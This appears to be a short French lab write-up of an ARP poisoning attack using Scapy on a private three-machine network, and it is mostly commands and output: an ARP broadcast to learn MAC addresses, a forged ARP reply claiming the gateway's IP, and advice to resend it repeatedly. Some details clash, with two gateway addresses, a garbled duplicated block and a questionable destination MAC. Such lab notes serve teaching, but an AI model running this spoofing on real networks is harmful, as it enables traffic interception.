# Attaque ARP poisoning

## Setup

On a 3 machines branchées dans un réseau privé :

- Bob : `192.168.42.10`
- Alice : `192.168.42.11`
- Hook : `192.168.42.12`

La Gateway a pour adresse : `192.168.121.1`

## Etape 1 : récupérer les adresses MAC

On commence par lancer un broadcast pour obtenir les adresses MAC de la gateway et de la cible
```python
>>> arpbroadcast=Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst="192.168.121.1")
>>> received = srp(arpbroadcast, timeout=2)
Begin emission:
Finished sending 1 packets.
*
Received 1 packets, got 1 answers, remaining 0 packets
>>> received[0][0][1].hwsrc
'52:54:00:f9:6b:67'
>>> received[0][0][1].hwdst
'52:54:00:61:0a:09'
>>> received[0][0][1].hwdstarpbroadcast=Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst="192.168.121.1")
>>> received = srp(arpbroadcast, timeout=2)
Begin emission:
Finished sending 1 packets.
*
Received 1 packets, got 1 answers, remaining 0 packets
>>> received[0][0][1].hwsrc
'52:54:00:f9:6b:67'
>>> received[0][0][1].hwdst
'52:54:00:61:0a:09'
```

On a donc :

Gateway :

- ip : `192.168.42.1`
- adresse MAC : `52:54:00:f9:6b:67`

Cible :

- ip : `192.168.42.11`
- adresse MAC : `52:54:00:61:0a:09`

On crée notre trame ARP :

```python
>>> arpspoofed=ARP(op=2, psrc="192.168.121.1", pdst="192.168.42.11", hwdst="52:54:00:f9:6b:67")
```

On peut observer la trame avec :
```python
>>> arpspoofed.show()
###[ ARP ]### 
  hwtype= 0x1
  ptype= IPv4
  hwlen= None
  plen= None
  op= is-at
  hwsrc= 52:54:00:60:6c:5c
  psrc= 192.168.121.1
  hwdst= 52:54:00:f9:6b:67
  pdst= 192.168.42.11
```
Puis on l'envoie :

```python
send(arpspoofed)
.
Sent 1 packets.
```

Afin que la table de la victime reste à jour avec les bonnes données, il faut lancer l'attaque régulièrement pour éviter qu'elle se remette à jour avec les données non spoofées.